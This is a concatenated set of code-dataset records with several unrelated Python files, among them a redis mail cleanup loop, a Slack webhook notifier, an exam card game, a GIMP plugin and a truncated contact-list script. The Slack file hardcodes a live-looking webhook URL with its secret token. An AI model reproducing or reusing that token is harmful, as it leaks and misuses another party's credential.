_convertFromString(value)\n","sub_path":"edna2/utils/UtilsDnaTables.py","file_name":"UtilsDnaTables.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"220403007","text":"\nfrom __future__ import annotations\n\nimport asyncio\nimport logging\nfrom asyncio import Task\nfrom collections.abc import Awaitable, Callable\nfrom contextlib import AsyncExitStack\nfrom typing import ClassVar, NoReturn\n\nfrom aioredis import Redis, ConnectionClosedError\nfrom pymap.context import connection_exit\n\nfrom .keys import GlobalKeys, CleanupKeys, NamespaceKeys, ContentKeys, \\\n MailboxKeys\nfrom .scripts.cleanup import CleanupScripts\n\n__all__ = ['CleanupTask', 'CleanupThread']\n\n_log = logging.getLogger(__name__)\n_scripts = CleanupScripts()\n\n\nclass CleanupTask:\n \"\"\"Maintains a :class:`CleanupThread` for the duration of the process\n lifetime, restarting on failure.\n\n Args:\n connect_redis: Supplies a connected redis object.\n root: The root redis key.\n\n \"\"\"\n\n #: The delay between redis reconnect attempts, on connection failure.\n connection_delay: ClassVar[float] = 5.0\n\n def __init__(self, connect_redis: Callable[[], Awaitable[Redis]],\n global_keys: GlobalKeys) -> None:\n super().__init__()\n self._connect_redis = connect_redis\n self._global_keys = global_keys\n\n async def _run_forever(self) -> NoReturn:\n while True:\n try:\n async with AsyncExitStack() as stack:\n connection_exit.set(stack)\n redis = await self._connect_redis()\n await CleanupThread(redis, self._global_keys).run()\n except (ConnectionClosedError, OSError):\n pass\n await asyncio.sleep(self.connection_delay)\n\n def start(self) -> Task[NoReturn]:\n \"\"\"Return a task running the cleanup loop indefinitely.\"\"\"\n return asyncio.create_task(self._run_forever())\n\n\nclass CleanupThread:\n \"\"\"Defines the logic for monitoring and executing cleanup of various\n entities.\n\n Args:\n redis: The redis connection object.\n global_keys: The global keys group.\n\n \"\"\"\n\n namespace_ttl: ClassVar[int] = 0\n mailbox_ttl: ClassVar[int] = 600\n content_ttl: ClassVar[int] = 3600\n\n def __init__(self, redis: Redis, global_keys: GlobalKeys) -> None:\n super().__init__()\n self._redis = redis\n self._global_keys = global_keys\n self._keys = keys = CleanupKeys(global_keys)\n self._order = (keys.mailboxes, keys.namespaces, keys.contents)\n\n async def run(self) -> NoReturn:\n \"\"\"Run the cleanup loop indefinitely.\n\n Raises:\n :class:`~aioredis.ConnectionClosedError`: The connection to redis\n was interrupted.\n\n \"\"\"\n redis = self._redis\n while True:\n await redis.unwatch()\n cleanup_key, cleanup_val = await redis.blpop(\n *self._order, timeout=0)\n try:\n await asyncio.shield(self._run_one(cleanup_key, cleanup_val))\n except Exception:\n _log.warning('Cleanup failed: key=%s val=%s',\n cleanup_key, cleanup_val, exc_info=True)\n raise\n\n async def _run_one(self, cleanup_key: bytes, cleanup_val: bytes) -> None:\n keys = self._keys\n if cleanup_key == keys.namespaces:\n namespace = cleanup_val\n await self._run_namespace(namespace)\n elif cleanup_key == keys.mailboxes:\n namespace, mailbox_id = cleanup_val.split(b'\\x00', 1)\n await self._run_mailbox(namespace, mailbox_id)\n elif cleanup_key == keys.contents:\n namespace, email_id = cleanup_val.split(b'\\x00', 1)\n await self._run_content(namespace, email_id)\n\n async def _run_namespace(self, namespace: bytes) -> None:\n ns_keys = NamespaceKeys(self._global_keys, namespace)\n await _scripts.namespace(self._redis, self._keys, ns_keys,\n ttl=self.namespace_ttl)\n\n async def _run_mailbox(self, namespace: bytes, mailbox_id: bytes) -> None:\n ns_keys = NamespaceKeys(self._global_keys, namespace)\n mbx_keys = MailboxKeys(ns_keys, mailbox_id)\n await _scripts.mailbox(self._redis, self._keys, mbx_keys,\n ttl=self.mailbox_ttl)\n\n async def _run_content(self, namespace: bytes, email_id: bytes) -> None:\n ns_keys = NamespaceKeys(self._global_keys, namespace)\n ct_keys = ContentKeys(ns_keys, email_id)\n await _scripts.content(self._redis, ns_keys, ct_keys,\n ttl=self.content_ttl)\n","sub_path":"pymap/backend/redis/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341439244","text":"#https://hooks.slack.com/services/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\nimport json\nimport requests\nimport datetime\nfrom dateutil.parser import parse\n\n# Set the webhook_url to the one provided by Slack when you create the webhook at https://my.slack.com/services/new/incoming-webhook/\n# =============================================================================\n# webhook_url = 'https://hooks.slack.com/services/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'\n# slack_data = {'text': \"Sup! We're hacking shit together @HackSussex :spaghetti:\"}\n# \n# response = requests.post(\n# webhook_url, data=json.dumps(slack_data),\n# headers={'Content-Type': 'application/json'}\n# )\n# if response.status_code != 200:\n# raise ValueError(\n# 'Request to slack returned an error %s, the response is:\\n%s'\n# % (response.status_code, response.text)\n# )\n# =============================================================================\n \nclass SlackWebHooks:\n def __init__(self, webhook_url, slack_data=None):\n self.webhook_url = webhook_url\n self.slack_data = slack_data\n \n def genSlackData(self, obj):\n attach_obj = {}\n attach_obj['color'] = '#36a64f'\n attach_obj['title'] = obj['iName']\n attach_obj['title_link'] = obj['iLink']\n \n text ='*PRICE:*\\n'+obj['iPrice']+'\\n\\n*STOCK/SIZE:*'\n for size in obj['iSize']:\n text = text + '\\n<' + obj['iLink'] +'|' + size + '>'\n \n #text = text + '\\n\\n*PRICE:*\\n' + obj['iPrice']\n \n attach_obj['text'] = text\n attach_obj['thumb_url'] = obj['iImgURL']\n attach_obj['mrkdwn_in'] = ['text']\n \n \n tmp = {}\n tmp['username'] = \"username\"\n tmp['attachments'] = [attach_obj]\n self.slack_data = tmp\n #print(json.dumps(self.slack_data))\n return json.dumps(self.slack_data)\n \n def sendToSlack(self, obj):\n response = requests.post(\n self.webhook_url, data=self.genSlackData(obj),\n headers={'Content-Type': 'application/json'}\n )\n if response.status_code != 200:\n raise ValueError(\n 'Request to slack returned an error %s, the response is:\\n%s'\n % (response.status_code, response.text)\n )\n \n def genNikeSlackData(self, obj):\n attach_obj = {}\n attach_obj['color'] = '#36a64f'\n attach_obj['title'] = obj['iName']\n attach_obj['title_link'] = obj['iLink']\n \n text = ''\n #adding launch date and status if status is HOLD\n if obj['iExtra']['status'] is not None and obj['iExtra']['status'] == 'HOLD':\n launchDate = parse(obj['iExtra']['launch'])\n text = text + '*LAUNCHING:*\\t\\t\\t*STATUS*\\n'\n text = text + launchDate.strftime('%a %b %d %Y') + '\\t\\t' + obj['iExtra']['status'] + '\\n'\n text = text + launchDate.strftime('%H:%M:%S') + '\\n'\n text = text + 'GMT +0000 (UTC)\\n'\n \n text = text + '*PRICE:*\\n'+obj['iPrice']+'\\n\\n*SIZE:*'\n for size in obj['iSize']:\n text = text + '\\n<' + obj['iLink'] +'|' + size + '>'\n \n #text = text + '\\n\\n*PRICE:*\\n' + obj['iPrice']\n \n attach_obj['text'] = text\n attach_obj['thumb_url'] = obj['iImgURL']\n attach_obj['mrkdwn_in'] = ['text']\n \n \n tmp = {}\n tmp['username'] = \"username\"\n tmp['attachments'] = [attach_obj]\n self.slack_data = tmp\n #print(json.dumps(self.slack_data))\n return json.dumps(self.slack_data)\n \n def sendToNikeSlack(self, obj):\n response = requests.post(\n self.webhook_url, data=self.genNikeSlackData(obj),\n headers={'Content-Type': 'application/json'}\n )\n if response.status_code != 200:\n raise ValueError(\n 'Request to slack returned an error %s, the response is:\\n%s'\n % (response.status_code, response.text)\n )","sub_path":"SlackWebHooks.py","file_name":"SlackWebHooks.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"386868459","text":"# Skeleton Program code for the AQA COMP1 Summer 2014 examination\r\n# this code should be used in conjunction with the Preliminary Material\r\n# written by the AQA Programmer Team\r\n# developed in the Python 3.2 programming environment\r\n# version 2 edited 06/03/2014\r\n\r\nimport random, datetime\r\n\r\nSameCardLower = True\r\nACE_HIGH = True\r\nNO_OF_RECENT_SCORES = 3\r\n\r\n\r\nclass TCard():\r\n def __init__(self):\r\n self.Suit = 0\r\n self.Rank = 0\r\n\r\nclass TRecentScore():\r\n def __init__(self):\r\n self.Name = ''\r\n self.Score = ''\r\n self.Date = ''\r\n\r\nDeck = [None]\r\nRecentScores = [None]\r\nChoice = ''\r\n\r\ndef GetRank(RankNo):\r\n Rank = ''\r\n if RankNo == 1:\r\n Rank = 'Ace'\r\n elif RankNo == 2:\r\n Rank = 'Two'\r\n elif RankNo == 3:\r\n Rank = 'Three'\r\n elif RankNo == 4:\r\n Rank = 'Four'\r\n elif RankNo == 5:\r\n Rank = 'Five'\r\n elif RankNo == 6:\r\n Rank = 'Six'\r\n elif RankNo == 7:\r\n Rank = 'Seven'\r\n elif RankNo == 8:\r\n Rank = 'Eight'\r\n elif RankNo == 9:\r\n Rank = 'Nine'\r\n elif RankNo == 10:\r\n Rank = 'Ten'\r\n elif RankNo == 11:\r\n Rank = 'Jack'\r\n elif RankNo == 12:\r\n Rank = 'Queen'\r\n elif RankNo == 13:\r\n Rank = 'King'\r\n elif RankNo == 14:\r\n Rank = 'Ace'\r\n return Rank\r\n\r\ndef GetSuit(SuitNo):\r\n Suit = ''\r\n if SuitNo == 1:\r\n Suit = 'Clubs'\r\n elif SuitNo == 2:\r\n Suit = 'Diamonds'\r\n elif SuitNo == 3:\r\n Suit = 'Hearts'\r\n elif SuitNo == 4:\r\n Suit = 'Spades'\r\n return Suit\r\n\r\ndef DisplayMenu():\r\n print()\r\n print('-------------------------MAIN MENU-------------------------')\r\n print()\r\n print('1. Play game (with shuffle)')\r\n print('2. Play game (without shuffle)')\r\n print('3. Display recent scores')\r\n print('4. Reset recent scores')\r\n print('5. Options')\r\n print('6. Save Recent Scores')\r\n print('7. Load Recent Scores')\r\n print()\r\n print('Select an option from the menu (or enter q to quit): ', end='')\r\n\r\ndef OptionsMenu():\r\n print(\"-----------------------OPTIONS MENU-------------------------\")\r\n print()\r\n print('1. Ace High / Ace Low')\r\n print('2. Card of same score ends game')\r\n print()\r\n \r\n OptionsMenuChoice = input('Select an option from the menu (or enter q to quit): ')\r\n if OptionsMenuChoice == '1':\r\n ACE_HIGH_CHOICE = input(\"Would you like to set Ace (H)igh / Ace (L)ow? :\")\r\n if ACE_HIGH_CHOICE == 'H':\r\n global ACE_HIGH\r\n ACE_HIGH = True\r\n elif OptionsMenuChoice == '2':\r\n SetSameScore()\r\n\r\ndef SetSameScore():\r\n global SameCardLower\r\n Done = False\r\n while not Done:\r\n Choice = input(\"Do you want the next card to have the same or lower value as the current card?: \")\r\n Choice = Choice.upper()\r\n Choice = Choice[0]\r\n if Choice == 'S':\r\n Done = True\r\n SameCardLower = False\r\n elif Choice == 'L':\r\n Done = True\r\n SameCardLower = True\r\n \r\n\r\n \r\n \r\n\r\ndef GetMenuChoice():\r\n Choice = input()\r\n Choice = Choice.capitalize()\r\n if Choice == 'Q' or Choice == 'Quit':\r\n Choice = 'q'\r\n print()\r\n return Choice\r\n\r\ndef LoadDeck(Deck):\r\n CurrentFile = open('deck.txt', 'r')\r\n Count = 1\r\n while True:\r\n LineFromFile = CurrentFile.readline()\r\n if not LineFromFile:\r\n CurrentFile.close()\r\n break\r\n Deck[Count].Suit = int(LineFromFile)\r\n LineFromFile = CurrentFile.readline()\r\n Deck[Count].Rank = int(LineFromFile)\r\n if ACE_HIGH == True and Deck[Count].Rank == 1:\r\n Deck[Count].Rank = 14\r\n Count = Count + 1\r\n \r\ndef ShuffleDeck(Deck):\r\n SwapSpace = TCard()\r\n NoOfSwaps = 1000\r\n for NoOfSwapsMadeSoFar in range(1, NoOfSwaps + 1):\r\n Position1 = random.randint(1, 52)\r\n Position2 = random.randint(1, 52)\r\n SwapSpace.Rank = Deck[Position1].Rank\r\n SwapSpace.Suit = Deck[Position1].Suit\r\n Deck[Position1].Rank = Deck[Position2].Rank\r\n Deck[Position1].Suit = Deck[Position2].Suit\r\n Deck[Position2].Rank = SwapSpace.Rank\r\n Deck[Position2].Suit = SwapSpace.Suit\r\n\r\ndef DisplayCard(ThisCard):\r\n print()\r\n print('Card is the', GetRank(ThisCard.Rank), 'of', GetSuit(ThisCard.Suit))\r\n print()\r\n\r\ndef GetCard(ThisCard, Deck, NoOfCardsTurnedOver):\r\n ThisCard.Rank = Deck[1].Rank\r\n ThisCard.Suit = Deck[1].Suit\r\n for Count in range(1, 52 - NoOfCardsTurnedOver):\r\n Deck[Count].Rank = Deck[Count + 1].Rank\r\n Deck[Count].Suit = Deck[Count + 1].Suit\r\n Deck[52 - NoOfCardsTurnedOver].Suit = 0\r\n Deck[52 - NoOfCardsTurnedOver].Rank = 0\r\n\r\ndef IsNextCardHigher(LastCard, NextCard):\r\n Higher = False\r\n if NextCard.Rank > LastCard.Rank:\r\n Higher = True\r\n if SameCardLower == True:\r\n if NextCard.Rank == LastCard.Rank:\r\n Higher = True\r\n return Higher\r\n\r\ndef GetPlayerName():\r\n print()\r\n ValidName = False\r\n while ValidName == False:\r\n PlayerName = input('Please enter your name: ')\r\n print()\r\n if len(PlayerName) > 0:\r\n ValidName = True\r\n return PlayerName\r\n\r\ndef GetChoiceFromUser():\r\n Choice = input('Do you think the next card will be higher than the last card (enter y or n)? ')\r\n Choice = Choice.capitalize()\r\n if Choice == 'Y' or Choice =='Yes':\r\n Choice = 'y'\r\n elif Choice == 'N' or Choice == 'No':\r\n Choice = 'n'\r\n return Choice\r\n\r\ndef DisplayEndOfGameMessage(Score):\r\n print()\r\n print('GAME OVER!')\r\n print('Your score was', Score)\r\n if Score == 51:\r\n print('WOW! You completed a perfect game.')\r\n print()\r\n\r\ndef DisplayCorrectGuessMessage(Score):\r\n print()\r\n print('Well done! You guessed correctly.')\r\n print('Your score is now ', Score, '.', sep='')\r\n print()\r\n\r\ndef ResetRecentScores(RecentScores):\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n RecentScores[Count].Name = ''\r\n RecentScores[Count].Score = 0\r\n RecentScores[Count].Date = ''\r\n\r\ndef DisplayRecentScores(RecentScores):\r\n ##BubbleSortScores(RecentScores)\r\n print()\r\n print('Recent Scores: ')\r\n print()\r\n print(\"{0:<10}{1:<10}{2:<10}\".format(\"Name\",\"Score\",\"Date\"))\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n print(\"{0:<10}{1:<10}{2:<10}\".format(RecentScores[Count].Name, RecentScores[Count].Score, RecentScores[Count].Date))\r\n print()\r\n print('Press the Enter key to return to the main menu')\r\n input()\r\n print()\r\n\r\ndef UpdateRecentScores(RecentScores, Score):\r\n Date = datetime.datetime.now()\r\n PlayerName = GetPlayerName()\r\n FoundSpace = False\r\n Count = 1\r\n while (not FoundSpace) and (Count <= NO_OF_RECENT_SCORES):\r\n if RecentScores[Count].Name == '':\r\n FoundSpace = True\r\n else:\r\n Count = Count + 1\r\n if not FoundSpace:\r\n for Count in range(1, NO_OF_RECENT_SCORES):\r\n RecentScores[Count].Name = RecentScores[Count +1].Name\r\n RecentScores[Count].Score = RecentScores[Count +1].Score\r\n RecentScores[Count].Date = RecentScores[Count +1].Date\r\n Count = NO_OF_RECENT_SCORES\r\n RecentScores[Count].Name = PlayerName\r\n RecentScores[Count].Score = Score\r\n RecentScores[Count].Date = Date.strftime(\"%d/%m/%Y\")\r\n\r\ndef SaveScores(RecentScores):\r\n with open('save_scores.txt', mode = 'w', encoding= 'UTF-8')as my_file:\r\n for Count in range(1, NO_OF_RECENT_SCORES +1):\r\n my_file.write(str(RecentScores[Count].Score)+ \"\\n\")\r\n my_file.write(str(RecentScores[Count].Name)+ \"\\n\")\r\n my_file.write(str(RecentScores[Count].Date)+ \"\\n\")\r\n\r\n \r\ndef LoadScores():\r\n try:\r\n with open(\"save_scores.txt\",mode=\"r\")as my_file:\r\n counter =1\r\n count =1\r\n done = False\r\n for line in my_file:\r\n if (count -1) != NO_OF_RECENT_SCORES:\r\n if counter == 1:\r\n RecentScores[count].Name = line.rstrip(\"\\n\")\r\n elif counter == 2:\r\n RecentScores[count].Score= line.rstrip(\"\\n\")\r\n elif counter == 3:\r\n RecentScores[count].Date = line.rstrip(\"\\n\")\r\n count+=1\r\n counter=0\r\n counter+=1\r\n except IOError:\r\n print()\r\n print(\"Sorry No File Was Found\")\r\n print()\r\n\r\n\r\n\r\n\r\n\r\ndef BubbleSortScores(RecentScores):\r\n Swapped = True\r\n while Swapped:\r\n Swapped = False\r\n for Count in range(1, NO_OF_RECENT_SCORES):\r\n if RecentScores[Count + 1].Score > RecentScores[Count].Score:\r\n temp = RecentScores[Count + 1]\r\n RecentScores[Count +1] = RecentScores[Count]\r\n RecentScores[Count] = temp\r\n Swapped = True\r\n\r\ndef PlayGame(Deck, RecentScores):\r\n RecentScoreCounter = 0\r\n LastCard = TCard()\r\n NextCard = TCard()\r\n GameOver = False\r\n GetCard(LastCard, Deck, 0)\r\n DisplayCard(LastCard)\r\n NoOfCardsTurnedOver = 1\r\n while (NoOfCardsTurnedOver < 52) and (not GameOver):\r\n GetCard(NextCard, Deck, NoOfCardsTurnedOver)\r\n Choice = ''\r\n while (Choice != 'y') and (Choice != 'n'):\r\n Choice = GetChoiceFromUser()\r\n DisplayCard(NextCard)\r\n NoOfCardsTurnedOver = NoOfCardsTurnedOver + 1\r\n Higher = IsNextCardHigher(LastCard, NextCard)\r\n if (Higher and Choice == 'y') or (not Higher and Choice == 'n'):\r\n DisplayCorrectGuessMessage(NoOfCardsTurnedOver - 1)\r\n LastCard.Rank = NextCard.Rank\r\n LastCard.Suit = NextCard.Suit\r\n else:\r\n GameOver = True\r\n if GameOver:\r\n DisplayEndOfGameMessage(NoOfCardsTurnedOver - 2)\r\n HighScoreChoice = input(\"Do you want to Add your score to the High Score Table? (y/n): \")\r\n HighScoreChoice = HighScoreChoice.upper()\r\n if HighScoreChoice == 'Y':\r\n UpdateRecentScores(RecentScores, NoOfCardsTurnedOver - 2)\r\n else:\r\n DisplayEndOfGameMessage(51)\r\n HighScoreChoice = input(\"Do you want to Add your score to the High Score Table? (y/n): \")\r\n HighScoreChoice = HighScoreChoice.upper()\r\n if HighScoreChoice == 'Y':\r\n UpdateRecentScores(RecentScores, 51)\r\n\r\nif __name__ == '__main__':\r\n for Count in range(1, 53):\r\n Deck.append(TCard())\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n RecentScores.append(TRecentScore())\r\n Choice = ''\r\n while Choice != 'q':\r\n DisplayMenu()\r\n Choice = GetMenuChoice()\r\n if Choice == '1':\r\n LoadDeck(Deck)\r\n ShuffleDeck(Deck)\r\n PlayGame(Deck, RecentScores)\r\n elif Choice == '2':\r\n LoadDeck(Deck)\r\n PlayGame(Deck, RecentScores)\r\n elif Choice == '3':\r\n DisplayRecentScores(RecentScores)\r\n elif Choice == '4':\r\n ResetRecentScores(RecentScores)\r\n elif Choice == '5':\r\n OptionsMenu()\r\n elif Choice == '6':\r\n SaveScores(RecentScores)\r\n elif Choice == '7':\r\n LoadScores()\r\n","sub_path":"Skeleton Program.py","file_name":"Skeleton Program.py","file_ext":"py","file_size_in_byte":10255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"216938137","text":"#!/usr/bin/env python\r\nfrom gimpfu import *\r\nimport math\r\n\r\ndef window_shadow(image, shadow_angle, shadow_opacity, shadow_color, shadow_length):\r\n \r\n # start operation\r\n pdb.gimp_undo_push_group_start(image)\r\n \r\n # save default background color \r\n old_color = pdb.gimp_palette_get_background()\r\n \r\n # set background fill { FOREGROUND-FILL (0), BACKGROUND-FILL (1), WHITE-FILL (2), TRANSPARENT-FILL (3), PATTERN-FILL (4), NO-FILL (5) }\r\n pdb.gimp_palette_set_background(shadow_color)\r\n \r\n # save link original layer\r\n org_layer = image.active_layer\r\n\r\n # save position original layer\r\n org_x, org_y = org_layer.offsets\r\n\r\n # create blur shadow\r\n blur_shadow_Layer = gimp.Layer(\r\n image, # canvas\r\n \"tmp\", # name + my name\r\n image.width, # width\r\n image.height, # height\r\n 1, # type { RGB-IMAGE (0), RGBA-IMAGE (1), GRAY-IMAGE (2), GRAYA-IMAGE (3), INDEXED-IMAGE (4), INDEXEDA-IMAGE (5) }\r\n 40, # opacity\r\n 0); # mode { NORMAL-MODE (0), DISSOLVE-MODE (1), BEHIND-MODE (2), MULTIPLY-MODE (3), SCREEN-MODE (4), OVERLAY-MODE (5), DIFFERENCE-MODE (6), ADDITION-MODE (7), SUBTRACT-MODE (8), DARKEN-ONLY-MODE (9), LIGHTEN-ONLY-MODE (10), HUE-MODE (11), SATURATION-MODE (12), COLOR-MODE (13), VALUE-MODE (14), DIVIDE-MODE (15), DODGE-MODE (16), BURN-MODE (17), HARDLIGHT-MODE (18), SOFTLIGHT-MODE (19), GRAIN-EXTRACT-MODE (20), GRAIN-MERGE-MODE (21), COLOR-ERASE-MODE (22), ERASE-MODE (23), REPLACE-MODE (24), ANTI-ERASE-MODE (25) }\r\n \r\n # add blur shadow layer\r\n image.add_layer(blur_shadow_Layer, 1)\r\n \r\n # original layer selection\r\n pdb.gimp_selection_layer_alpha(org_layer)\r\n \r\n # fill layer selected\r\n pdb.gimp_edit_fill(blur_shadow_Layer, 1)\r\n \r\n # clear selection\r\n pdb.gimp_selection_clear(image)\r\n \r\n # create new layer\r\n layer = gimp.Layer(\r\n image, # canvas\r\n \"tmp\", # name + my name\r\n org_layer.width, # width\r\n org_layer.height, # height\r\n 1, # type { RGB-IMAGE (0), RGBA-IMAGE (1), GRAY-IMAGE (2), GRAYA-IMAGE (3), INDEXED-IMAGE (4), INDEXEDA-IMAGE (5) }\r\n 100, # opacity\r\n 0); # mode { NORMAL-MODE (0), DISSOLVE-MODE (1), BEHIND-MODE (2), MULTIPLY-MODE (3), SCREEN-MODE (4), OVERLAY-MODE (5), DIFFERENCE-MODE (6), ADDITION-MODE (7), SUBTRACT-MODE (8), DARKEN-ONLY-MODE (9), LIGHTEN-ONLY-MODE (10), HUE-MODE (11), SATURATION-MODE (12), COLOR-MODE (13), VALUE-MODE (14), DIVIDE-MODE (15), DODGE-MODE (16), BURN-MODE (17), HARDLIGHT-MODE (18), SOFTLIGHT-MODE (19), GRAIN-EXTRACT-MODE (20), GRAIN-MERGE-MODE (21), COLOR-ERASE-MODE (22), ERASE-MODE (23), REPLACE-MODE (24), ANTI-ERASE-MODE (25) }\r\n \r\n # set layer position\r\n layer.translate(org_x, org_y)\r\n\r\n # add layer to image\r\n image.add_layer(layer, 2)\r\n\r\n # original layer selection\r\n pdb.gimp_selection_layer_alpha(org_layer)\r\n\r\n # fill layer selected\r\n pdb.gimp_edit_fill(layer, 1)\r\n \r\n # clear selection\r\n pdb.gimp_selection_clear(image)\r\n \r\n # copy first layer\r\n copyLayer = layer.copy()\r\n \r\n # set step move layer\r\n angle = math.pi / 180 * shadow_angle\r\n sx = math.cos(angle)\r\n sy = math.sin(angle)\r\n\r\n # set layer position\r\n xp = sx\r\n yp = sy\r\n \r\n for i in range(shadow_length):\r\n # \r\n xi = int(round(xp, 1))\r\n yi = int(round(yp, 1))\r\n \r\n # move new layer\r\n copyLayer.translate(xi, yi)\r\n\r\n # add to image new layer\r\n image.add_layer(copyLayer)\r\n\r\n # merge down layer\r\n mergwLayer = pdb.gimp_image_merge_down(image, copyLayer, 0)\r\n\r\n # create new pattern from layer\r\n copyLayer = mergwLayer.copy()\r\n\r\n # create position from new layer\r\n xp += sx\r\n yp += sy\r\n \r\n # set opacity new layer - shadow\r\n mergwLayer.opacity = shadow_opacity\r\n \r\n # create blur shadow\r\n pdb.gimp_selection_layer_alpha(mergwLayer)\r\n pdb.plug_in_gauss_iir(image, blur_shadow_Layer, shadow_length * 10, True, True)\r\n \r\n # merge shadows\r\n resultShadowLayer = pdb.gimp_image_merge_down(image, blur_shadow_Layer, 0)\r\n resultShadowLayer.name = org_layer.name + \" #shadow\"\r\n gimp.delete(resultShadowLayer)\r\n \r\n # auto crop shadow layer\r\n pdb.plug_in_autocrop_layer(image, resultShadowLayer)\r\n \r\n # set last background color\r\n pdb.gimp_palette_set_background(old_color)\r\n \r\n # clear last selection\r\n pdb.gimp_selection_clear(image)\r\n \r\n # end operation\r\n pdb.gimp_undo_push_group_end(image)\r\n\r\n# register plugin\r\nregister(\r\n \"python_fu_window_shadow\",\r\n \"window shadow plugin\",\r\n \"window shadow plugin\",\r\n \"window shadow plugin\",\r\n \"window shadow plugin\",\r\n \"2016\",\r\n \"Window shadow\",\r\n \"*\",\r\n [\r\n (PF_IMAGE, 'image', 'Image', None),\r\n (PF_SLIDER, 'shadow_angle', 'Angle', 45, (-180, 180, 0)),\r\n (PF_SLIDER, 'shadow_opacity', 'Opacity', 10, (0, 100, 0)),\r\n (PF_COLOR, 'shadow_color', 'Set color', (0.0, 0.0, 0.0, 1.0)),\r\n (PF_INT, 'shadow_length', 'Length', 10)\r\n ],\r\n [],\r\n window_shadow,\r\n menu=\"/Filters/Languages/Python-Fu\")\r\n\r\nmain()\r\n","sub_path":"window_shadow.py","file_name":"window_shadow.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"147930723","text":"import numpy as np\n\ndef poly( p, x, y):\n Nx = len(x)\n Np = (p+1)*(p+2)/2\n s = -np.ones(Nx)\n t = y\n dex = np.abs(y-1) > 1e-10\n s[dex] = 2*(1+x[dex])/(1-y[dex])-1\n\n V = np.zeros((Nx,Np))\n ll = 0\n tfact = np.ones(Nx)\n\npoly(1, [0], [0])\n","sub_path":"Code/Python/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"52731454","text":"#-*- coding:utf-8 -*-\nfrom random import random\nnum=int(input('실험 횟수는 ? '))\ncnt=0.0\nfor i in range(num):\n x=random()\n y=random()\n if x*x + y*y <= 1:\n cnt+=1\nprint((cnt/num)*4)\n","sub_path":"python/AI/monte_pi2.py","file_name":"monte_pi2.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"538425842","text":"f = open(\"users.txt\",\"r\")\r\n# print(f.read())\r\n\r\n\r\nl= []\r\nmasterlist = {}\r\ncounter= 0\r\niden= 0\r\n\r\nfor x in f:\r\n\tl.append((x).strip(\"\\n\"))\r\n\tcounter += 1\r\n\tif counter == 7:\r\n\t\tprint(l)\r\n\t\tfor x in range(1):\r\n\t\t\tmasterlist[iden]= l\r\n\t\tiden += 1\r\n\t\tcounter= 0\r\n\t\tl=[]\r\n\r\nprint(masterlist)\r\n#creates lists within a dictionary\r\n\r\n\r\ndef nextnumber():\r\n\tfor x in range(1,1000000):\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif x != int(b[0]):\r\n\t\t\t\treturn x\r\n\t\t\t\tbreak\r\n\r\n\r\n\r\n\r\n\r\nadd = input(\"Would you like to add a person details?: \") #input for whether the person would like to add details \r\nadd = add.lower() #input to lower case\r\n\r\nif add == \"yes\":\r\n\ta = nextnumber() #AUTO increment version of ID\r\n\tprint(\"ID: \", a)\r\n\tb = input(\"First Name: \") #input gets saved as b and get written on the next line\r\n\tc = input(\"Second Name: \")\r\n\td = input(\"Address line 1: \")\r\n\te = input(\"Address line 2: \")\r\n\tf = input(\"Post code: \")\r\n\tg = input(\"Telephone Number: \")\r\n\ta= a +\"\\n\" #added on to string is the opperation to start a new line\r\n\tb= b +\"\\n\"\r\n\tc= c +\"\\n\"\r\n\td= d +\"\\n\"\r\n\te= e +\"\\n\"\r\n\tf= f +\"\\n\"\r\n\tg= g +\"\\n\"\r\n\r\n\tt = open(\"user.txt\", \"a\")\r\n\tt.write(a)\r\n\tt.write(b) # writes on its own line \r\n\tt.write(c)\r\n\tt.write(d)\r\n\tt.write(e)\r\n\tt.write(f)\r\n\tt.write(g)\r\n\tt.close()\r\n\r\n\r\n# else:\r\n# \tcontinue\r\n\r\nz= len(masterlist)\r\ny= int(z)*7\r\n\r\ndef check(n):\r\n\tfound = False\r\n\th = open(\"users.txt\", \"r\")\r\n\tli = []\r\n\tfor i in range(y):\r\n\t\tli.append((h.readline()).strip(\"\\n\"))\r\n\r\n\tfor m in li:\r\n\t\tif m == n:\r\n\t\t\tfound = True\r\n\t\t\tbreak\r\n\th.close()\r\n\treturn found\r\n\r\n\r\n\r\n\r\ndlt = input(\"Would you like to delete someone off the list?: \")\r\ndlt = dlt.lower()\r\n\r\n# print(\"-----------\")\r\n# print(masterlist)\r\n# print(masterlist[1])\r\n\r\nprint(\"-----------\")\r\n# dlt = \"yes\"\r\nif dlt == \"yes\":\r\n\ta = input(\"ID: \")\r\n\tif check(a)== True:\r\n\t\tc= int(a) -1\r\n\t\tb = masterlist[c]\r\n\t\tprint(b[c])\r\n\t\tdel b\r\n\t\th = open(\"uesrs.txt\", \"r\")\r\n\r\nprint(\"Menu\")\t\r\nprint(\"1 - Identification Number\")\r\nprint(\"2 - Firstname\")\r\nprint(\"3 - Surname\")\r\nprint(\"4 - Address 1\")\r\nprint(\"5 - Address 2\")\r\nprint(\"6 - Postcode\")\r\nprint(\"7 - Telephone Number\")\r\n\r\n\r\n\r\n\r\nsearch = int(input(\"Search by: \"))\r\n\r\nif search == 1:\r\n\ta = input(\"ID: \")\r\n\tif a in masterlist:\r\n\t\ta= int(a)-1\r\n\t\tprint(masterlist(a))\r\nelif search == 2:\r\n\ta = input(\"Firstname: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 1:\r\n\t\t\t\tprint(b)\r\n\r\nelif search == 3:\r\n\ta = input(\"Surname: 